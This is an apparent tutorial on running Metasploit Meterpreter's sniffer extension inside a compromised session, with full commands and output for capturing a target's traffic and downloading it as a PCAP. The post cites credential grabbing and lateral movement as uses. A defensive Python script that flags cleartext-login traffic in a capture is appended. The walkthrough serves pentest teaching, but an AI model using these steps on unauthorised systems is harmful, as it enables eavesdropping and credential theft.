Meterpreter allows you to run a packet sniffer through an extension, and one very important point is that the sniffer is never saved to the target's hard drive. I will explain how to enable the packet sniffer in Metasploit with Meterpreter:

Let's assume you are already connected through some exploit and have a Meterpreter session open; then you type the following:

### Use the sniffer extension
meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > ?

Sniffer Commands

    Command             Description
    -------             -----------
    sniffer_dump        Retrieve captured packet data to PCAP file
    sniffer_interfaces  Enumerate all sniffable network interfaces
    sniffer_release     Free captured packets on a specific interface instead of downloading them
    sniffer_start       Start packet capture on a specific interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet capture on a specific interface

### Check which interface to use to sniff the traffic
meterpreter > sniffer_interfaces
1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Realtek PCIe GBE Family Controller' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
### You can see that interface 2 is the network one, so we start the capture on that interface:
meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
### Stop the sniffer
meterpreter > sniffer_stop 2
[*] Capture stopped on interface 2
[*] There are 3099 packets (1365925 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
### Download the data
meterpreter > sniffer_dump 2 /root/raul.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 3099 packets (1427905 bytes)
[*] Downloaded 036% (524288/1427905)...
[*] Downloaded 073% (1048576/1427905)...
[*] Downloaded 100% (1427905/1427905)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /root/raul.pcap

Then I was able to open the file using wireshark raul.pcap

Where can you use this? You can use it to grab credentials, to move horizontally on the network if you are pentesting a network, or to troubleshoot any computer problem on the network.
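
The credential point above, seen from the defending side: the sketch below is an added example, not part of the original post or of Metasploit, that reads a classic PCAP file such as the one written by sniffer_dump (either byte order) and counts the TCP packets that belong to protocols which send logins unencrypted, so you know which services to move to TLS or SSH. The port list and the function names are assumptions made for the illustration, and the sample capture is constructed inline.

```python
import struct
from collections import Counter

# Assumption: these well-known ports stand in for "protocols that send logins unencrypted".
CLEARTEXT = {21: "ftp", 23: "telnet", 80: "http", 110: "pop3", 143: "imap"}

def cleartext_summary(pcap: bytes) -> Counter:
    """Count TCP packets per cleartext service in a classic (non-pcapng) PCAP."""
    order = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}.get(pcap[:4])
    if order is None or len(pcap) < 24:
        raise ValueError("not a classic PCAP file")
    if struct.unpack(order + "I", pcap[20:24])[0] != 1:
        raise ValueError("only Ethernet captures (linktype 1) are handled")
    hits, off = Counter(), 24                      # skip the 24-byte global header
    while off + 16 <= len(pcap):                   # each record has a 16-byte header
        incl_len = struct.unpack(order + "I", pcap[off + 8:off + 12])[0]
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        # Skip anything that is not IPv4 (EtherType 0x0800) carrying TCP (protocol 6).
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue
        tcp = 14 + (frame[14] & 0x0F) * 4          # honour the IPv4 header length field
        if len(frame) < tcp + 4:
            continue
        for port in struct.unpack("!HH", frame[tcp:tcp + 4]):
            if port in CLEARTEXT:                  # count each packet once
                hits[CLEARTEXT[port]] += 1
                break
    return hits

def build_sample() -> bytes:
    """Constructed capture: five TCP packets with zeroed addresses and checksums."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for sport, dport in [(49152, 21), (49153, 443), (80, 49154), (49155, 23), (49156, 21)]:
        ip = bytes([0x45, 0]) + struct.pack("!H", 40) + bytes(4) + bytes([64, 6]) + bytes(10)
        frame = bytes(12) + b"\x08\x00" + ip + struct.pack("!HH", sport, dport) + bytes(16)
        out += struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame
    return out

if __name__ == "__main__":
    for service, count in cleartext_summary(build_sample()).most_common():
        print(f"{service}: {count} packets")
```

Run against a capture from your own network, any non-zero count marks a service whose logins are readable by whoever can sniff that segment.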